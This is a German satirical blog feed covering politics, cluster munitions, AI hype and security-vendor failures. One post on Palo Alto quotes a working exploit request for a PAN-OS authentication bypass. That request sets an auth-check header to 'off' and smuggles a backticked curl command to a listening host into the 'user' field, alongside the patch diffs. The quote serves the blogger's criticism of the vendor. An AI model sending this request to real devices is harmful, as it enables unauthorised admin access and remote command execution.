Fragen? Antworten! Siehe auch: Alternativlos
Netanjahu lässt antworten:
Es gebe nichts Gerechteres, als den Krieg, den Israel im Gazastreifen führt. Die Haftbefehle seien "antisemitische Entscheidungen", getroffen von "voreingenommenen Richtern getrieben von antisemitischem Hass gegen Israel", heißt es in der Erklärung weiter.Antisemiten. Überall Antisemiten, sage ich euch.
Bugs gibt es nicht nur für Hard- oder Software, sondern auch in Wetware. Einer wurde gerade entdeckt, und könnte ein Durchbruch in der Krebstherapie sein.Sehr cool, finde ich! (Danke, Manuel)Money quote: "Gliocidin activity targets a de novo purine synthesis vulnerability in glioblastoma"
Es geht um eine vulnerability in der Purin-Synthese, die spezifisch für Glioblastome ist. Für diesen Tumor gibt es bis heute keine effektive Therapie. Der Exploit ist ein kleines Molekül (Gliocidin). "De novo" ist bio-speak for zero-day :-))
Auf der Metaebene ist es spannend zu sehen, wie "mechanistisch" Biologie geworden ist. Und wie damit computer science und liefe science auf gemeinsame Terminologie konvergieren.
Hier ist der seriösere der offenen Briefe.
Der Zug ist abgefahren. Biden und Harris hatten JAHRE Zeit, das Wahlsystem zu reformieren. Haben sie nicht gemacht. Weil sie dachten, vielleicht, dass ihnen das Herrschaftswissen selber mal nutzen würde.
Geliefert wie bestellt. Ich habe kein Mitleid und keinen Drang da irgendwas aufgeklärt zu kriegen. Das war ihre Chance und sie haben es verkackt.
So und nur so funktioniert Evolution. Wenn man sich aus verkacktem Verhalten wieder rausschleimen kann, funktioniert das nicht. Das muss tödlich sein und die nächste Generation hat dann hoffentlich was gelernt. Oder sie ereilt, genauso verdient, dasselbe Schicksal.
Ich positioniere mich immer gerne so, dass ich danach Told You So sagen kann. Well... Told You So. Nein, ich werde euch jetzt nicht helfen, die Auswirkungen eures nicht auf mich hörens zu verringern.
Na? Krieg ich jetzt auch wieder Leserbriefe, dass die gar nicht wirklich geächtet sind?
Wir haben die besten Golfplätze! Mit den meisten Kratern, äh, Löchern!
Und alle so: NEIN!!!! DOCH!!! OOOOOH!!
Immerhin ist die Benamung richtig. Es handelt sich um einen Agenten. Nur halt nicht für unsere Seite.
Trend Micro bewirbt sich auch direkt auf einen Lame Excuse Award:
Um die Lücke zu missbrauchen, benötigten Angreifer physischen oder Fernzugriff auf eine verwundbare Maschine, schränkt Trend Micro ein.Was genau schränkt das ein? LMAO (Danke, Magnus)
Die Deutsche Bank steigt bei "KI"-Startup Aleph Alpha ein, kauft Anteile von Frühinvestoren (d.h. kauft die VCs raus, die offenbar kapiert haben, dass dieser "KI"-Scheiß Bullshit ist und raus wollten).
Das finde ich schonmal eine gute Nachricht, wenn die VCs um ihr Leben fürchten.
Aber was will die Deutsche Bank mit "KI"? Nun, ...
Das Institut nimmt auch an einem Projekt von Creance.ai teil – einer Kooperation von PwC Deutschland und Aleph Alpha, bei der untersucht wird, wie generative KI helfen kann, Compliance-Anforderungen effizienter zu bewältigen. Verträge mit Dienstleistern sollen im Einklang mit der EU-Verordnung DORA validiert werden.Da unseren Regulierern und Politikern in Sachen "was könnten wir mal besser machen" nichts einfällt außer "Hmm man könnte mehr Papierkram von den Firmen fordern", versinken die Firmen gerade alle in sinnlosem Papierkrieg und produzieren alle Palettenweise sinnlosen Text, den nie jemand lesen wird.
Denn wer sollte das lesen? Die Regulierungsbehörden? Soviele Bürger gibt es in diesem Land nicht, die die alle einstellen müssten. Die Regulierer wissen das, die Firmen wissen das, und damit ist der Weg frei für: "KI" schreibt die sinnlosen Texte, die eh nie jemand lesen wird.
Eine Erfolgsgeschichte! Ach was sage ich: Ein Exportschlager!!
Denn Deutschland drückt diese Marktverzerrung (kleine Konkurrenten können sich den Scheiß nicht leisten, so garantiert die Politik das Überleben der Deutschen Bank und anderer Ineffizienzmaschinen) natürlich EU-weit durch. Die werden auch alle "KI" kaufen müssen. Warum also nicht bei uns?!
Wenn es nicht so traurig wäre, könnte man die alle prima auslachen.
Update: Ist ja gut. Ihr könnt mir zu schreiben aufhören, dass man halt eine "KI" anschaffen muss, um den "KI"-Compliance-Output zu lesen. Der Witz war implizit, denn eine "KI" ist ja keine Person. Das liest nach wie vor niemand.
Die Entscheidung wird wahrscheinlich klarer, wenn man guckt, um was für einen Beitrag es hier ging:
Der Blockierte hatte das Ergebnis einer Kreistagswahl 2021 so kommentiert: "Die Deutschen sind sowas von krank. Deutschland hat fertig."Lol wat? Dafür sperrt Facebook Accounts und löscht unilateral Beiträge?!
Chinese hackers exploit Fortinet VPN zero-day to steal credentials
Und natürlich ist Fortinet genau so drauf wie der Rest der Industrie, wenn es um Bug-Fix-Geschwindigkeit geht."Volexity reported this vulnerability to Fortinet on July 18, 2024, and Fortinet acknowledged the issue on July 24, 2024," explains the report."At the time of writing, this issue remains unresolved and Volexity is not aware of an assigned CVE number."
Aber Fortinet ist nicht Microsoft, also kolportiert die Presse nicht das übliche unerträgliche Gewinsel von Microsoft, dass hier unschuldige Kunden gefährdet würden und man doch Responsible Disclosure fordert. Da krieg ich jedesmal Zucken in der Faust, wenn ich das lese. Die Kunden werden ja nicht von der Disclosure gefährdet sondern von der beschissenen Produktqualität ihrer versifften Zulieferer. (Danke, Dino)
Nun, nehmt nicht mein Wort, dass das geächtet ist. Nehmt das der ARD, wenn es um Russland ging.
Diese Waffen sind durch internationale Verträge geächtet.Ach. Ach was. Aber wenn die Ukraine das einsetzt, ist es nicht geächtet, nehme ich an? Tolle Wurst. (Danke, Oliver)
Einem ehemaligen Geschäftsführer, der noch Gehalt kassierte, wurde gekündigt. Gegen weitere Mitarbeiter wurden Disziplinarmaßnahmen eingeleitet.Und, fast noch schockierender:
Die bisherige Organisationsform mit einer "aufgeblähten" 119-köpfigen Verbandsversammlung und einem von Politikern dominierten Vorstand werde reformiert, heißt es. Künftig sollen mehr IT-Experten dem Gremium angehören.ACH. ACH WAS. Es ist jemandem aufgefallen, dass Politiker gar nichts können und man ihnen keine Verantwortung übergeben darf, schon gar nicht in Gesellschaften, die einen tatsächlichen Zweck erfüllen sollen und nicht nur Geld verbrennen dürfen wie Lotto und SPD-eigene Verlage? Das ist ja unglaublich!
Gibt es etwa doch noch Hoffnung?
Update: Wenn man genauer hinguckt, ist die Antwort natürlich: Nein, gibt es nicht. Denn keiner von denen musste in den Knast, keiner musste irgendwas zurückzahlen, im Gegenteil hat der eine Typ noch jahrelang Gehalt gekriegt, ohne dafür auch nur zur Arbeit erschienen zu sein. Wie das halt so ist, wenn "kommunale Dienstleister" mit abgehalfterten Politikern bestuhlt werden.
immerhin sei Windows 11 bereits "das sicherste Betriebssystem der Welt", wie die Ankündigung betont.BWAHAHAHA genau mein Humor!
Und schließlich will Microsoft den Identitätsschutz verbessern, um Phishing-Angriffe zu verhindern.Der einzige, der alle eure Daten sehen können soll, soll Microsoft sein. Und ihr bezahlt noch dafür. Wie diese Mauer um Mexiko herum, falls ihr euch erinnert.
Ich glaube nicht, dass das ernst gemeint ist. Ich glaube, das Kalkül lief etwa so: Biden ist eine lahme Ente, wir sind frisch abgewählt, und Trump hasst unsere Kumpels, die Tech Bros.
Trump findet ja, dass die Social Networks und Suchmaschinen ihn unfair benachteiligt haben, indem sie seine Misinformationen zu bekämpfen und rauszufiltern versucht haben, und hat daher als neuen FCC-Chef (deren Kommunikations-Regulierer) diesen Spezialexperten ausgesucht, der von einem "Zensurkartell" spricht, das man jetzt zerschlagen müsse.
Das ungerechte Zorn der Republikaner richtet sich vor allem gegen Facebook, aber auch gegen Google, wegen Suche und Youtube, wo Google bei Covid-Lügnern Hinweise eingeblendet hat, so man sich inhaltlich belastbarer informieren kann.
Aus Sicht der untoten Democrats im abgewählten Justizministerium ist also absehbar, dass Trump die Tech-Riesen zerschlagen wird. Die Democrats wissen auch, dass Kartelle Scheiße sind, und wenn die Tech Bros nicht alle in Democrat-Hochburgen säßen und dort Arbeitsplätze schüfen, hätte man vielleicht auch schonmal etwas zu unternehmen versucht. Aber hey, wenn die eh demnächst geschlachtet werden, dann kann man wenigstens jetzt so tun, als sei man selbst der Auslöser gewesen, der hier Gerechtigkeit schafft. Denn das Narrativ ist den Democrats ja bereits ziemlich komplett entglitten an der Stelle. Google Search ist so schlecht geworden, dass Googles "das schadet dem Kunden" vor allem Gelächter auslöst.
Southern Lebanon is actually northern Israel - opinion
Na dann können wir das ja bedenkenlos annektieren! (Danke, Felix)
ATACMS können mit Streumunition bestückt werden, die sich am Zielort in einem weiten Radius verteilt. International ist Streumunition höchst umstritten, weil sie wegen ihres Streufaktors auch Jahre nach einem militärischen Konflikt zu zivilen Opfern führen kann. Im Ukraine-Krieg wurde sie auch deshalb ausgeliefert, um den großen Vorsprung Russlands bei der Munitionsproduktion auszugleichen. Zudem kann Streumunition besonders effektiv gegen Truppen und ungepanzerte Fahrzeuge im offenen Gelände eingesetzt werden.Schade, dass die ARD sich kein Fact Checking leisten kann. Sonst hätte ihnen jemand mitgeteilt, dass Streumunition nicht "umstritten" sondern geächtet ist. Das ist ethisch so sonnenklar, dass sogar der Heilige Stuhl das ratifiziert hat. Selbst der Südsudan ist beigetreten. Aber die USA, Russland und die Ukraine haben nicht unterschrieben, genausowenig wie China und Israel, Indien und Pakistan. Selbst in der EU gibt es ein paar Gruselstaaten, die sich in Ethikfragen noch hinter dem Südsudan eingereiht haben: Finnland, Estland, Lettland, Polen, Rumänien und Griechenland. Eine Schande.
Deutschland hat das unterschrieben und ratifiziert. Insofern bin ich irritiert, dass die ARD das jetzt als eine offene Streitfrage darstellt, ob man das einsetzen sollte oder nicht.
Wieviele KRITIS-Organisationen setzen eigentlich Fortinet oder Palo Alto ein? Und sind damit durch diverse Audits und Pentests gekommen?
Wir haben doch umfangreiche Dokumentationspflichten jetzt. Erzählt doch mal, wie gut die geholfen haben!
Wie viele Firmen haben ISO-27001 und Fortinet/Palo Alto?
Fällt euch selber was auf oder muss ich weiterreden?
Update: Leserbrief:
Ich arbeite in einem Kritis-Unternehmen (Strom). Habe heute im Flurfunk mitbekommen, dass wir in unserem neuen Rechenzentrum nicht mehr auf Fortinet setzen.
Wir werden da etwas einsetzen von:
Palo Alto
Badumm Tsssss
Ich persönlich wundere mich ja nicht, dass wir ständig gehackt werden. Ich wundere mich, dass wir nur so wenig gehackt werden. Das liegt wahrscheinlich daran, dass unsere Spezialexperten wegen des ganzen Checklistenballetts nicht bemerken, dass und wie lange und von wie vielen parallel sie schon kompromittiert wurden.
Jetzt überlege ich, ob ich nicht auch zu typischen Sicherheitslücken einfach Retrocomputing sagen sollte, weil das genau derselbe Scheiß ist, über den wir schon in den 1980er Jahren gelacht haben.
Aktuelles Beispiel: Palo Alto. Ja, die schon wieder. SCHON WIEDER. Ich hab auch keinen Bock mehr.
X-PAN-AUTHCHECK: offIch wünschte, ich würde Witze machen.
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1 Host: {{Hostname}} X-PAN-AUTHCHECK: off Content-Type: application/x-www-form-urlencoded Content-Length: 99 user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1Und was fiel da raus? Richtig! Eine gültige Session-ID!
Die haben einfach ein diff gemacht von dem Patch, auf dem Palo Alto jetzt wochenlang saß, während ihre Kunden fröhliche exploitet wurden.
+ $user = $_POST['user']; + if (strlen($user) <= 63 - $_POST['user'], + $user,Die neue Eingabevalidierung ist ... eine Längenbegrenzung. Nein, wirklich!
Ich wünschte, ich würde Witze machen.
- return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username"); + $u = $s->escapeshellarg($username); + return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $u");Wisst ihr was? You had me at PHP. (via)
Was?! Die FDP besteht aus windigen Geschäftemachern, deren Prinzipien nur vorgeschoben sind?! Das ist ja unglaublich, Bob! Hättet ihr mal die CDU gefragt, die wissen das schon länger!
Dass diese FDP-betriebene Abmahnfirma auch noch neben CDU-Hasszerrbild Habeck auch noch Julia Klöckner (CDU!!!) zu ihren Kunden zählt, rundet das Schreckenslagebild ab.
Update: Falls ihr "NIUS" nicht kennt: Das ist das neue Projekt von Ex-"Bild"-"Redakteur" Julian Reichelt, der ja auch wegen Verrats an Döpfner Ärger hatte. Da schließt sich der Kreis. Auch du, Brutus?
CDU-Politiker zweifeln an Verlässlichkeit der FDP.
Nein, wirklich! Die Verlässlichkeit der FDP!!!
FDP-Chef Christian Lindner komme ihm "mehr wie ein Spieler vor denn als ein verlässlicher Politiker", sagte der innenpolitische Sprecher der Unionsfraktion im Bundestag, Alexander Throm dem Magazin Stern. Der CDU-Politiker fügte hinzu: "Das einzige, auf was man sich bei Lindner verlassen kann, ist die Orientierung an den eigenen Interessen der FDP."CDU-Politiker (!) haben erkannt (!!), dass der Lindner nur seine eigene Karriere optimiert und dabei wie ein Zocker agiert.
Ich weiß gar nicht, was mich daran mehr erschüttert. Dass jemand in der CDU etwas erkannt hat, oder dass sie das für ein Unterscheidungsmerkmal zwischen CDU und FDP halten.
Ich finde das jedenfalls zum Brüllen komisch gerade.
Tja, liebe FDP. Außerhalb der SPD gilt immer noch: „Alle lieben den Verrat, niemand liebt den Verräter“.
Was meint ihr, können die nur autonom fahren oder erkennen die auch, wenn ihr Innenbereich von besoffenen Touristen vollgekotzt wurde?
Wird natürlich nicht passieren, denn wo sollen dann die "Aufwandsentschädigungen" und "Wahlkampfspenden" für die Parteien herkommen.
Das war bestimmt ein bedauerlicher Softwarefehler oder so. Oder menschliches Versagen. Dafür sind Palo Alto ja Spezialisten.
Auch dass da "Automatable: NO" steht ist glatt gelogen. Macht nur keiner, weil das einfach eine PHP-Seite ist, die das Admin-Passwort auf "palo alto" zurücksetzt, wenn ich das nicht mit einer anderen Palo-Alto-Lücke gerade verwechsele. Anderswo würde man das als Backdoor bezeichnen, nicht als "Lücke".
Aber hey, was reg ich mich auf. Ihr werdet alle weiter bei denen kaufen, und die werden keinen Druck haben, bessere Produkte zu bauen.
Das Hauptinteresse der Passanten gerade lässt sich offensichtlich befriedigen, indem man eine Liste von IPs als "IoC" verteilt. Wenn mir das vor 20 Jahren jemand als Scifi-Plot angeboten hätte, hätte ich ihn aus dem Raum gelacht.
Update: Ich habe das mit dem anderen Palo-Alto-Müll verwechselt. Hier brauchte man mehrere trivial automatisierbare Schritte.
Es handelt sich, natürlich, um einen Stapel Papier, in der ersten Fassung ca 1000 Seiten lang.
Primärquelle ist die FAZ, aber die hat sich ja mit ihrer Paywall selbst ins Aus geschossen, lizenziert aber ihre Inhalte an Microsoft, daher geht der Link oben zu MSN. Herzlichen Glückwunsch, FAZ. Geniale Strategie.
Ich für meinen Teil bin erleichtert, dass die Bundeswehr immerhin noch Papier produzieren kann. Auch wenn das vermutlich McKinsey für sie gemacht haben wird.
Was steht da so drin? Die FAZ zitiert einen brandheißen Tipp:
„Bilden Sie auf hundert Mitarbeiter mindestens fünf zusätzliche Lkw-Fahrer aus, die Sie nicht benötigen“, lautet sein Vorschlag nach F.A.Z.-Informationen.Diese Scheiß Osteuropäer immer! Nur weil zuhause ein bisschen Krieg ist, vernachlässigen die ihre Pflichten uns gegenüber!? Alle ausweisen!1!!Der Grund für die Maßnahme: „70 Prozent aller Lastwagen auf Deutschlands Straßen werden von Osteuropäern bewegt. Wenn dort Krieg ist, wo werden dann diese Leute sein?“
Scheiß Nordkoreaner immer! (Danke, Manuel)
Das Kabel lief wohl nahe der Nord Stream 2 Strecke und es gibt schon erste Sabotage-Spekulationen, weil Finnland ja in die Nato eingetreten ist.
Update: Undersea cable between Lithuania and Sweden damaged. Es scheint sich um ein separates Kabel zu handeln.
Geräusch als Warnung: KI kann vorab vor explodierenden Akkus warnenDie Witze schreiben sich praktisch von selbst.
Betroffene eines umfangreichen Datendiebstahls bei Facebook vor einigen Jahren haben nach einem Urteil des Bundesgerichtshofs (BGH) vergleichsweise niedrige Hürden, um Schadensersatz zu bekommen. Sie müssen nur nachweisen, dass sie Opfer des Vorfalls waren. Es sei weder nötig, dass die Daten nachweislich missbraucht wurden. Noch müssten die Betroffenen Belege dafür liefern, dass sie nun in besonderer Weise beeinträchtigt sind.Finde ich grundsätzlich gut. Hat kaum jemand mehr verdient als Facebook. Auf der anderen Seite: War das nicht ein Scraper? Erinnert sich da noch jemand? Das wäre nach meinem Rechtsverständnis nicht Facebooks Schuld, wenn du deine Daten bei denen hochlädst und andere sie dann halt automatisiert runterladen.
Aber egal, was mich hier wirklich ärgert ist der Kontrast zu Modern Solutions, wo der Hersteller straffrei ausging und sie den Hacker verknackt haben, der den Bug gemeldet hat.
Oh und natürlich zu den ganzen Ransomwarefällen, auch und speziell bei Behörden. Wieso habe ich als Bürger gegen die keine Schadensersatzpflichten analog dieser Regelung?
Aber hey, Facebook sind Ausländer, bei denen kann man es ja machen. Sagt ein Gericht, dessen Justizministerium ein Microsoft-Cloud-Abo hat.
Heute: In Russland stürzen jetzt nicht mehr nur Oppositionelle sondern auch Balletttänzer aus Fenstern.
Das Problem habe ich leider jedes Jahr aber so schlimm wie diesmal war es noch nie. Und es hört auch nicht auf! Guckt euch nur mal Palo Alto an. So blöde ist ja hoffentlich keiner von euch, bei denen zu kaufen. Die Meldung da ist vom Juni.
Die stellen also ihr "Expedition"-Produkt ein, das noch nie durch eine vertrauenswürdige Qualitätssimulation aufgefallen ist.
Warum? Nun, das könnte etwas hiermit zu tun haben: auth bypass (schöner Writeup dazu) SQL Injection OS Command Injection.
Ich applaudiere ja Palo Alto, dass sie erkennen, das ihr Produkt Schrott ist und weggeschmissen gehört. Das sollten viel mehr Hersteller machen. Aber wieso bei Expedition aufhören? PAN-OS hat genau solche Bugs auch gehabt. Von anderen Herstellern wie Fortinet oder Cisco mal ganz zu schweigen.
Mich fragte heute jemand, ob die das abreißen, weil zu viele Bugs reinkamen, und sie daher gemerkt haben, wie schrottig das ist. Meiner Erfahrung nach wissen alle Hersteller, wie schlecht ihre Produkte sind. Einige wollen es auf Management-Schicht nicht wahrhaben, und ganz, GANZ selten gibt es auch Produkte, bei denen die Ingenieure nicht wissen, wie Scheiße ihr Produkt ist, aber das ist echt die Ausnahme. Habe ich in knapp 30 Berufsjahren zweimal erlebt. Die meisten Firmen wissen das, und die sehen das als Gelegenheit, mit Supportverträgen Profit zu machen.
Häufig ist das so, dass ein Produkt ein Team hat, das über die Jahre technical debt aufgehäuft hat, und häufig geht der Verantwortliche dann, weil ein Mann von meiner Statur muss sich nicht mit brennenden Mülltonnen herumärgern, und der Rest des Teams erzählt mir beim Audit dann "das ist nicht mein Code, ich habe den bloß geerbt" (soll heißen: Ich habe keine Ahnung, was der tut, und traue mich nicht den anzufassen). Da kann ich echt die Uhr nach stellen bei Audits.
Natürlich will niemand in den Rückbau von technical debt investieren, daher wird das immer teurer und träger und am Ende sitzt man Monate auf Bugfixes (das Palo-Alto-Dingens gerade wurde denen im Juni gemeldet). Und guckt euch mal an, was das für ein geiler Bug ist. Die haben da eine PHP-Datei, per Web erreichbar, die das Admin-Passwort auf "paloalto" zurücksetzt. Ohne Authentisierung, versteht sich. Kann man einfach aufrufen und ist Admin.
Sorry, aber das ist kein "Bug". Das wusste die Firma auch, dass sie das haben. Dafür müsste in einer gerechten Welt jemand in den Knast.
Übrigens, am Rande: Falls ihr euch dachtet, Programmierer würden doch von ihrer Ethik und ihrer guten Erziehung davon abgehalten, brennende Mülltonnen in der Landschaft zu verteilen, dann solltet ihr diesen Artikel lesen. Programmierer sind von allen Berufsgruppen die unethischsten. Alle haben ein schlechtes Gewissen und fühlen sich als Betrüger, wenn sie "KI" fragen und dann so tun als sei das ihre Arbeit gewesen. Außer Programmierern. Die finden das normal.
Zentrale Gründe für das Unbehagen seien das Gefühl, Nutzung generativer KI fühle sich wie Mogeln an (47 Prozent), sowie Ängste, als weniger kompetent (46 Prozent) oder gar faul gesehen zu werden (46 Prozent).Coder sind schlechte Menschen. Nur schlechte Menschen wie Scammer, Spammer, Marketing-Kokser und Coder lassen sich von "KI" helfen und haben kein schlechtes Gewissen.In Deutschland waren es hauptsächlich Nachrichten an Chef (31 Prozent) oder an Kollegen auf der gleichen Hierarchiestufe (27 Prozent), Leistungsbeurteilungen (24 Prozent) oder Ideen-Brainstormings (22 Prozent), bei denen Befragte keine KI-Nutzung eingestehen mochten. Sich beim Coden von der KI helfen zu lassen, wäre hingegen nur neun Prozent peinlich.